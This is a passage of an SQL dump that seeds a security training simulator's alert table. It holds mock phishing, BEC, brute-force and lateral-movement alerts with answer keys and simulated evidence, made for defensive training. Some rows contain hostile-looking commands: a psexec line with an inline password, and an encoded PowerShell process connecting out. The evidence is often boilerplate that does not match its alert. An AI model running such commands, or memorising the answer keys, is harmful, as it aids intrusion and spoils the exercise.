'{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Suspicious Network Connection Detected\",\"date\":\"2026-02-01T20:32:22.621Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(937, 'Unusual Login Failure from Known Safe IP', 'low', 'Proofpoint', 'A login failure was detected from an IP address previously verified as safe. No further suspicious activity noted.', 'Credential Attack', 'T1078', 0, 'Closed', 210, '{\"timestamp\":\"2026-01-16T09:12:11Z\",\"event_type\":\"login_failure\",\"src_ip\":\"192.168.1.100\",\"dst_ip\":\"192.168.1.10\",\"username\":\"bsmith\",\"hostname\":\"office-01\",\"failed_attempts\":5}', '2026-01-16 13:02:59', '2026-02-26 21:49:59', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.100\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Known safe internal IP address\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"bsmith\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Regular user account\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The source IP is a known safe internal address, indicating a benign activity.\"}', 'Intermediate', 'SIEM', 5, 1, 'TECH', NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Unusual Login Failure from Known Safe IP\",\"date\":\"2026-02-01T20:32:22.622Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(938, 'Failed Process Execution from Internal Script', 'low', 'Proofpoint', 'A process execution attempt failed due to incorrect scripting, originating from an internal automation script.', 'Malware', 'T1106', 0, 'Closed', 232, '{\"timestamp\":\"2026-01-16T13:55:10Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.5.15\",\"dst_ip\":\"192.168.5.20\",\"username\":\"automation\",\"hostname\":\"automation-server\",\"command_line\":\"powershell.exe -ExecutionPolicy Bypass -File C:\\\\scripts\\\\update.ps1\"}', '2026-01-16 13:02:59', '2026-03-09 18:22:17', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"command\",\"value\":\"powershell.exe -ExecutionPolicy Bypass -File C:\\\\scripts\\\\update.ps1\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"clean\",\"details\":\"Regular internal script with a known issue\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.5.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal automation server\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The process execution is part of an internal script that failed due to a known error.\"}', 'Intermediate', 'EDR', 5, 1, 'HEALTHCARE', NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Failed Process Execution from Internal Script\",\"date\":\"2026-02-01T20:32:22.623Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(939, 'Lateral Movement Attempt via PSExec Detected', 'critical', 'Proofpoint', 'PSExec was used to attempt lateral movement within the network, indicating possible intrusion activity.', 'Lateral Movement', 'T1570', 1, 'resolved', NULL, '{\"timestamp\":\"2026-01-16T05:40:22Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.100.5\",\"dst_ip\":\"192.168.100.25\",\"username\":\"admin-temp\",\"hostname\":\"compromised-host\",\"command_line\":\"psexec \\\\\\\\192.168.100.25 -u admin -p password cmd.exe /c whoami\"}', '2026-01-16 13:02:59', '2026-02-16 17:53:53', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"command\",\"value\":\"psexec \\\\\\\\192.168.100.25 -u admin -p password cmd.exe /c whoami\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"malicious\",\"details\":\"PSExec use indicates lateral movement attempt\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.100.5\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Compromised internal host\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"192.168.100.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Target internal host\"}}],\"expected_actions\":[\"isolate_host\",\"reset_credentials\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"PSExec is a legitimate tool but commonly used for malicious lateral movement, confirming the attack.\"}', 'Intermediate', 'EDR', 5, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Lateral Movement Attempt via PSExec Detected\",\"date\":\"2026-02-01T20:32:22.624Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(940, 'Spear Phishing Attempt with Lookalike Domain', 'high', 'Proofpoint', 'An email was received from a domain that closely resembles a trusted partner\'s domain. The email contained an urgent request to review a document linked in the email.', 'Phishing', 'T1566', 1, 'resolved', NULL, '{\"timestamp\":\"2026-01-16T08:23:45Z\",\"event_type\":\"email_received\",\"src_ip\":\"198.51.100.23\",\"dst_ip\":\"192.168.1.45\",\"username\":\"jdoe@victimcompany.com\",\"hostname\":\"user-laptop-01\",\"email_sender\":\"ceo@trustedpartnerr.com\",\"domain\":\"trustedpartnerr.com\",\"url\":\"http://malicious-link.com/document\"}', '2026-01-16 13:04:11', '2026-02-16 17:12:39', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"ceo@trustedpartnerr.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"Domain used in phishing campaigns\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"http://malicious-link.com/document\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"URL associated with malware distribution\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address of user machine\"}}],\"expected_actions\":[\"block_url\",\"reset_credentials\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"The domain and URL are known for phishing, indicating a true positive.\"}', 'Beginner', 'CORE', 3, 1, 'FINANCE', NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Spear Phishing Attempt with Lookalike Domain\",\"date\":\"2026-02-01T20:32:22.625Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(941, 'Credential Harvesting via Fake Office365 Login Page', 'critical', 'Email Gateway', 'A phishing email was detected containing a link to a fake Office365 login page designed to steal user credentials.', 'Credential Harvest', 'T1566', 1, 'resolved', NULL, '{\"timestamp\":\"2026-01-16T09:15:03Z\",\"event_type\":\"email_received\",\"src_ip\":\"203.0.113.89\",\"dst_ip\":\"10.0.0.23\",\"username\":\"bsmith@company.com\",\"hostname\":\"workstation-05\",\"email_sender\":\"support@office365-support.com\",\"domain\":\"office365-support.com\",\"url\":\"http://phishy-login.com/login\"}', '2026-01-16 13:04:11', '2026-02-16 17:53:42', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"support@office365-support.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"Email address involved in phishing activities\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"http://phishy-login.com/login\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"URL hosting fake login pages for credential harvesting\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"10.0.0.23\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address of user machine\"}}],\"expected_actions\":[\"block_url\",\"reset_credentials\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The email and URL are confirmed to be malicious, constituting a true positive.\"}', 'Beginner', 'SIEM', 3, 1, 'TECH', NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Credential Harvesting via Fake Office365 Login Page\",\"date\":\"2026-02-01T20:32:22.626Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(942, 'Unauthorized Remote Access Attempt Detected', 'medium', 'CrowdStrike', 'A remote login attempt was made using valid credentials from an unusual geographic location.', 'Brute Force', 'T1078', 1, 'Closed', 225, '{\"timestamp\":\"2026-01-16T10:30:22Z\",\"event_type\":\"login_failure\",\"src_ip\":\"45.67.89.101\",\"dst_ip\":\"192.168.0.34\",\"username\":\"admin\",\"hostname\":\"server-01\",\"failed_attempts\":15}', '2026-01-16 13:04:11', '2026-03-06 10:23:45', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"45.67.89.101\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for brute force attacks\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"admin\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Commonly targeted username in attacks\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"192.168.0.34\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address of target server\"}}],\"expected_actions\":[\"block_ip\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The source IP has been reported for similar attacks, confirming it as malicious.\"}', 'Beginner', 'SIEM', 3, 1, 'ENERGY', NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(943, 'Suspicious Office365 Login Page Detected', 'medium', 'SIEM', 'A user accessed a URL resembling an Office365 login page. Further investigation revealed it was a phishing attempt.', 'Phishing', 'T1566', 0, 'Closed', 225, '{\"timestamp\":\"2026-01-16T11:45:10Z\",\"event_type\":\"web_request\",\"src_ip\":\"10.1.2.34\",\"dst_ip\":\"198.51.100.45\",\"username\":\"mjohnson@company.com\",\"hostname\":\"desktop-12\",\"url\":\"http://fakeoffice365.com/login\"}', '2026-01-16 13:04:11', '2026-03-06 10:20:33', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"url\",\"value\":\"http://fakeoffice365.com/login\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"URL recognized for phishing attacks\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.1.2.34\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address of user machine\"}}],\"expected_actions\":[\"block_url\",\"reset_credentials\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"The URL is a known phishing site, indicating a true positive.\"}', 'Beginner', 'SIEM', 3, 1, 'RETAIL', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.627Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-16T11:45:10Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"10.1.2.34\\\",\\\"dst_ip\\\":\\\"198.51.100.45\\\",\\\"username\\\":\\\"mjohnson@company.com\\\",\\\"hostname\\\":\\\"desktop-12\\\",\\\"url\\\":\\\"http://fakeoffice365.com/login\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.627Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-16T11:45:10Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"10.1.2.34\\\",\\\"dst_ip\\\":\\\"198.51.100.45\\\",\\\"username\\\":\\\"mjohnson@company.com\\\",\\\"hostname\\\":\\\"desktop-12\\\",\\\"url\\\":\\\"http://fakeoffice365.com/login\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.627Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-16T11:45:10Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"10.1.2.34\\\",\\\"dst_ip\\\":\\\"198.51.100.45\\\",\\\"username\\\":\\\"mjohnson@company.com\\\",\\\"hostname\\\":\\\"desktop-12\\\",\\\"url\\\":\\\"http://fakeoffice365.com/login\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.627Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-16T11:45:10Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"10.1.2.34\\\",\\\"dst_ip\\\":\\\"198.51.100.45\\\",\\\"username\\\":\\\"mjohnson@company.com\\\",\\\"hostname\\\":\\\"desktop-12\\\",\\\"url\\\":\\\"http://fakeoffice365.com/login\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.627Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-16T11:45:10Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"10.1.2.34\\\",\\\"dst_ip\\\":\\\"198.51.100.45\\\",\\\"username\\\":\\\"mjohnson@company.com\\\",\\\"hostname\\\":\\\"desktop-12\\\",\\\"url\\\":\\\"http://fakeoffice365.com/login\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(944, 'QR Code Phishing Attack', 'high', 'Email Gateway', 'An email containing a QR code linked to a phishing site was detected. The QR code directed users to a credential-stealing page.', 'Phishing', 'T1566', 1, 'Closed', 297, '{\"timestamp\":\"2026-01-16T12:00:05Z\",\"event_type\":\"email_received\",\"src_ip\":\"203.0.113.55\",\"dst_ip\":\"192.168.2.12\",\"username\":\"klee@company.com\",\"hostname\":\"laptop-07\",\"email_sender\":\"it-support@companyx.com\",\"domain\":\"companyx.com\",\"url\":\"http://phishing-site.com/qrcode\"}', '2026-01-16 13:04:11', '2026-03-15 11:47:14', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"it-support@companyx.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"Email address used in phishing campaigns\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"http://phishing-site.com/qrcode\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"URL linked to phishing activity\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"192.168.2.12\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address of user machine\"}}],\"expected_actions\":[\"block_url\",\"reset_credentials\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"The email and QR code URL are confirmed malicious, making this a true positive.\"}', 'Beginner', 'CORE', 3, 1, 'TECH', NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"QR Code Phishing Attack\",\"date\":\"2026-02-01T20:32:22.628Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(945, 'Email with Suspicious Attachment Detected', 'medium', 'Email Gateway', 'An email containing an attachment was detected, which appeared suspicious but was verified as safe after analysis.', 'Phishing', 'T1566', 0, 'closed', NULL, '{\"timestamp\":\"2026-01-16T13:22:15Z\",\"event_type\":\"email_received\",\"src_ip\":\"203.0.113.11\",\"dst_ip\":\"192.168.2.67\",\"username\":\"david@company.com\",\"hostname\":\"office-pc-01\",\"email_sender\":\"support@legitprovider.com\",\"domain\":\"legitprovider.com\",\"filename\":\"invoice.doc\"}', '2026-01-16 13:04:11', '2026-02-17 05:27:38', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"support@legitprovider.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"clean\",\"details\":\"Email sender verified as legitimate\"}},{\"id\":\"artifact_2\",\"type\":\"filename\",\"value\":\"invoice.doc\",\"is_critical\":false,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"clean\",\"details\":\"Attachment analyzed and no malicious activity detected\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"192.168.2.67\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address of user machine\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"The email and attachment were verified as clean, indicating a false positive.\"}', 'Beginner', 'CORE', 3, 1, 'FINANCE', NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Email with Suspicious Attachment Detected\",\"date\":\"2026-02-01T20:32:22.629Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(946, 'Suspicious Lookalike Domain Email', 'low', 'Proofpoint', 'An email from a domain that looks similar to a trusted partner\'s domain was received, but analysis confirmed it as legitimate.', 'Phishing', 'T1566', 0, 'closed', NULL, '{\"timestamp\":\"2026-01-16T14:10:30Z\",\"event_type\":\"email_received\",\"src_ip\":\"198.51.100.99\",\"dst_ip\":\"192.168.3.12\",\"username\":\"lisa@company.com\",\"hostname\":\"desktop-15\",\"email_sender\":\"contact@trustpartner.com\",\"domain\":\"trustpartner.com\"}', '2026-01-16 13:04:11', '2026-02-17 05:27:47', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"contact@trustpartner.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"clean\",\"details\":\"Domain verified as legitimate\"}},{\"id\":\"artifact_2\",\"type\":\"domain\",\"value\":\"trustpartner.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"clean\",\"details\":\"Domain confirmed as legitimate\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"192.168.3.12\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address of user machine\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"The domain and email sender are confirmed legitimate, making this a false positive.\"}', 'Beginner', 'CORE', 3, 1, 'GOVERNMENT', NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Suspicious Lookalike Domain Email\",\"date\":\"2026-02-01T20:32:22.630Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(947, 'BEC Attempt Using CEO Impersonation', 'high', 'Email Gateway', 'An email impersonating the CEO was detected, attempting to initiate an unauthorized fund transfer.', 'Phishing', 'T1566', 1, 'resolved', NULL, '{\"timestamp\":\"2026-01-16T15:42:08Z\",\"event_type\":\"email_received\",\"src_ip\":\"203.0.113.77\",\"dst_ip\":\"10.0.5.23\",\"username\":\"finance@company.com\",\"hostname\":\"accounting-pc\",\"email_sender\":\"ceo@company.com\",\"domain\":\"company.com\",\"url\":\"http://malicious-transfer.com/funds\"}', '2026-01-16 13:04:11', '2026-02-16 17:10:44', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"ceo@company.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"Email used in BEC scams\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"http://malicious-transfer.com/funds\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"URL associated with fraudulent financial actions\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"10.0.5.23\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address of user machine\"}}],\"expected_actions\":[\"block_url\",\"reset_credentials\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"The email and URL are known for BEC scams, confirming a true positive.\"}', 'Beginner', 'CORE', 3, 1, 'FINANCE', NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"BEC Attempt Using CEO Impersonation\",\"date\":\"2026-02-01T20:32:22.631Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(948, 'Brute Force Attack Detected from External IP', 'high', 'Splunk', 'Multiple failed login attempts detected on user account from a known malicious IP address.', 'Brute Force', 'T1110', 1, 'Closed', 93, '{\"timestamp\":\"2026-01-16T10:23:45Z\",\"event_type\":\"login_failure\",\"src_ip\":\"203.0.113.45\",\"dst_ip\":\"192.168.1.10\",\"username\":\"jdoe\",\"hostname\":\"workstation01\",\"failed_attempts\":35}', '2026-01-16 13:12:47', '2026-02-01 20:32:22', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for brute force attacks\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal user account activity\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The repeated failed login attempts from a known malicious IP indicate a brute force attack.\"}', 'Novice', 'SIEM', 1, 1, 'FINANCE', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.633Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-16T10:23:45Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"workstation01\\\",\\\"failed_attempts\\\":35}\"},{\"timestamp\":\"2026-02-01T20:31:22.633Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-16T10:23:45Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"workstation01\\\",\\\"failed_attempts\\\":35}\"},{\"timestamp\":\"2026-02-01T20:30:22.633Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 